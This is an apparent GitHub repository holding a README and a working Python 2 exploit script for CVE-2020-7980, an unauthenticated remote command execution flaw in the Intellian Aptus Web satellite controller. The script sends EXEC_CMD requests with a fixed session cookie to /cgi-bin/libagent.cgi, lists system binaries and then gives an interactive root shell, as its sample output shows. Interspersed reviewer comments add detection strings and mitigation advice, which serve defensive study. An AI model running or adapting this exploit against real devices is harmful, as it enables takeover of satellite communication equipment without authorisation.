├── README.md └── satellian.py /README.md: -------------------------------------------------------------------------------- 1 | # Satellian-CVE-2020-7980 2 | Satellian is a PoC script that demonstrates an RCE vulnerability in the Intellian Satellite controller (Intellian Aptus Web). 3 | 4 | The following script will try to list all the binaries in the system and afterwards will allow the tester to interact directly with the server (usually as root). 5 | 6 | # PoC 7 | ``` 8 | xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http:// 9 | ________________________________________ 10 | (__) / \ 11 | (oo) ( Intellian Satellite Terminal PoC ) 12 | /-------\/ --' \________________________________________/ 13 | / | || 14 | * ||----|| 15 | 16 | Performing initial scan. Listing available system binaries. 17 | Starting request to http:// 18 | Executing command /bin/ls /bin 19 | acu_server 20 | acu_tool 21 | addgroup 22 | adduser 23 | ... 24 | 25 | Satellian $ id 26 | uid=0(root) gid=0(root) 27 | ``` 28 | 29 | # Tested versions 30 | Intellian v1.12, v1.21, v1.24. 31 | 32 | 33 | # Disclaimer 34 | All the information in this repository is for educational purposes only. The author of the repository is in no way responsible for any misuse of the information. This script is just a proof of concept, and has in no way been developed for malicious activities.
# /satellian.py
# Exploit Title: Satellian
# Date: 28/01/2020
# Exploit Author: Xh4H
# Vendor Homepage: https://www.intelliantech.com/?lang=en
# Version: v1.12+
# Tested on: Kali linux, MacOS
# CVE : CVE-2020-7980

# xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://
# ________________________________________
# (__) / \
# (oo) ( Intellian Satellite Terminal PoC )
# /-------\/ --' \________________________________________/
# / | ||
# * ||----||

# Performing initial scan. Listing available system binaries.
# Starting request to http://
# Executing command /bin/ls /bin
# acu_server
# acu_tool
# addgroup
# adduser
# ...

# Satellian $ id
# uid=0(root) gid=0(root)

# Reviewer notes (defensive reading of this file):
# - The script is Python 2 only: it uses the `print` statement and
#   `raw_input`, so it does not parse under Python 3.
# - Every request it sends has the same shape: a JSON POST to
#   /cgi-bin/libagent.cgi?type=J&<epoch seconds>000 whose body carries
#   "F_": "EXEC_CMD" and whose cookies are ctr_t=0 and sid=123456789.
#   Those constants are usable as match strings in web-server logs or
#   IDS rules on networks that host this controller.
# - No login request is made anywhere in this file; the sid value is a
#   fixed constant. Whether the device validates it is not shown here.
# - Mitigation is outside this file: keep the controller's web interface
#   off untrusted networks and apply the vendor's fixed firmware
#   (fixed version not stated on this page).

import requests
import argparse
import sys
import calendar
import time
from termcolor import colored

def cprint(text, color): # colored print
    """Write `text` plus a trailing newline to stdout, bold, in `color`."""
    sys.stdout.write(colored(text + "\n", color, attrs=["bold"]))

def httpize(url):
    """Return `url`, prefixed with "http://" when it does not start with "http".

    The test is a plain string-prefix check, so any value beginning with
    "http" is treated as already carrying a scheme.
    """
    if not url.startswith("http"):
        cprint("Missing protocol, using http . . .", "yellow")
        url = "http://" + url
    return url

def send_command(url, command, verbose):
    """POST one EXEC_CMD request to the controller and print the extracted reply.

    url     -- base URL; '/cgi-bin/libagent.cgi?...' is appended to it.
    command -- string placed verbatim in the "Q" field of the JSON body.
    verbose -- when true, print the target and command first, and exit the
               process if the extracted output is shorter than 4 characters.

    Nothing is returned; the output is printed.
    """
    # Request body. "S_" and the sid cookie below are the same fixed number;
    # the script never obtains a session from the device.
    RCE = {"O_":"A","V_":1,"S_":123456789,"F_":"EXEC_CMD","P1_":{"F":"EXEC_CMD","Q":command}}
    # Marker that precedes the command output in the response body.
    # NOTE(review): this literal spans two lines; any indentation before
    # `},` on its second line was lost in this listing -- compare against
    # the original file before relying on it.
    string_to_split = '''"SUCCESS_"
},'''

    if verbose:
        cprint("Starting request to %s" % url, "yellow")
        cprint("Executing command %s" % command, "yellow")

    # The query string ends with the current epoch seconds followed by "000".
    # No timeout is passed, so the call can block indefinitely on a host
    # that accepts the connection but never answers.
    a = requests.post(url + '/cgi-bin/libagent.cgi?type=J&' + str(calendar.timegm(time.gmtime())) + '000', json=RCE, cookies={'ctr_t': '0', 'sid': '123456789'})
    # Keep the body from the marker up to two characters before the end, then
    # drop the marker. If the marker is absent, find() returns -1 and the
    # slice [-1:-2] is empty, so command_output is the empty string.
    command_output = a.content[a.content.find(string_to_split):-2].replace(string_to_split, '')

    # Only the verbose (initial) call treats a near-empty reply as
    # "not vulnerable"; later calls print whatever was extracted.
    # sys.exit() raises SystemExit, which the `except Exception` handler
    # at the bottom of the file does not catch.
    if len(command_output) < 4 and verbose:
        cprint("Target doesn't seem to be vulnerable\nExiting.", 'red')
        sys.exit()
    print command_output

# Everything from here to main() runs at import time, not only when the file
# is executed as a script.
# NOTE(review): runs of spaces in the banner appear collapsed in this
# listing; the original alignment is not recoverable from it.
cprint("""
________________________________________
(__) / \\
(oo) ( Intellian Satellite Terminal PoC )
/-------\\/ --' \\________________________________________/
/ | ||
* ||----||
""", "green")

parser = argparse.ArgumentParser(description="Satellian: A PoC script for CVE-2020-7980")
parser.add_argument("-u", "--url", help="Base url")
args = parser.parse_args()

# -u is not declared required, so its absence is handled by hand here.
if args.url is None:
    cprint("Missing arguments.\nUsage example:\n" + sys.argv[0] + " -u http://10.10.10.14\n", "red")
    sys.exit()

# Module-level target URL read by main().
url = httpize(args.url)

def main():
    """Send the fixed '/bin/ls /bin' probe, then relay each stdin line as a command.

    The loop has no exit branch; it ends only when an exception or signal
    interrupts it.
    """
    cprint("Performing initial scan. Listing available system binaries.", "green")
    send_command(url, '/bin/ls /bin', True)

    while True:
        command = raw_input('Satellian $ ')
        send_command(url, command, False)

if __name__ == '__main__':
    try:
        main()
    except Exception as e:
        # Any Exception subclass (e.g. a requests connection error) is
        # printed and the script ends; no traceback is shown.
        print e
        print "\nAn error happened."